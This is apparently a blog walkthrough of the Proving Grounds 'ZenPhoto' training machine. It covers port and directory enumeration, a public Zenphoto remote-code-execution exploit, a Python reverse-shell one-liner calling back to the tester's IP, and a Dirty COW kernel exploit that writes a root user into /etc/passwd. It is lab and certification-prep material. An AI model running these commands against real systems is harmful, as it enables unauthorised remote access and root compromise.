Logo
Overview

PG: ZenPhoto | Walkthrough

November 24, 2021
2 min read
PG/Machines Boot2Root OSCP/Prep writeups CVE/Zenphoto CVE/RDS protocol dirtycow

Enumeration

Network Scan with Nmap

Terminal window
$ nmap $ip -p22,23,80,3306 -sVC --version-all


PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 83:92:ab:f2:b7:6e:27:08:7b:a9:b8:72:32:8c:cc:29 (DSA)
|_  2048 65:77:fa:50:fd:4d:9e:f1:67:e5:cc:0c:c6:96:f2:3e (RSA)
23/tcp   open  ipp     CUPS 1.4
|_http-title: 403 Forbidden
| http-methods:
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.4
80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.14 (Ubuntu)
3306/tcp open  mysql   MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)

Directory Fuzzing

Terminal window
$ gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --no-error -q  -x php,html,txt
/index                (Status: 200) [Size: 75]
/index.html           (Status: 200) [Size: 75]
/index.html           (Status: 200) [Size: 75]
/test                 (Status: 301) [Size: 313] [--> http://192.168.66.41/test/]

zenphoto on /test/ directory is vulnerable to RCE Exploit-db

Initial access

Terminal window
$ php 18083.php $ip /test/
+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+
zenphoto-shell# whoami
www-data
zenphoto-shell# which python
/usr/bin/python
zenphoto-shell# python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.66",80));os.dup2(s.fileno(),0);os.dup2(s.fileno
(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Privilege Escalation

Kernel Exploitation

Terminal window
www-data@offsecsrv:/tmp$ uname -a
Linux offsecsrv 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux
www-data@offsecsrv:/tmp$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=10.04
DISTRIB_CODENAME=lucid
DISTRIB_DESCRIPTION="Ubuntu 10.04.3 LTS"

Dirty cow: https://raw.githubusercontent.com/evait-security/ClickNRoot/master/1/exploit.c

Terminal window
www-data@offsecsrv:/tmp$ gcc -pthread ./exploit.c -o dirty -lcrypt
www-data@offsecsrv:/tmp$ ./dirty password
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: password
Complete line:
evait:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash


mmap: b77ef000


ptrace 0
Done! Check /etc/passwd to see if the new user was created
You can log in with username evait and password password.


DON'T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!!


www-data@offsecsrv:/tmp$ su evait
Password: madvise 0


Done! Check /etc/passwd to see if the new user was created
You can log in with username evait and password password.




DON'T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!!


evait@offsecsrv:/tmp# cd /root
evait@offsecsrv:~# ls
mysqlpass  proof.txt
evait@offsecsrv:~# cat proof.txt
3761b3bc60093a037056cd2538b46b31

Also vulnerable to RDS Protocol LPE - exploit-db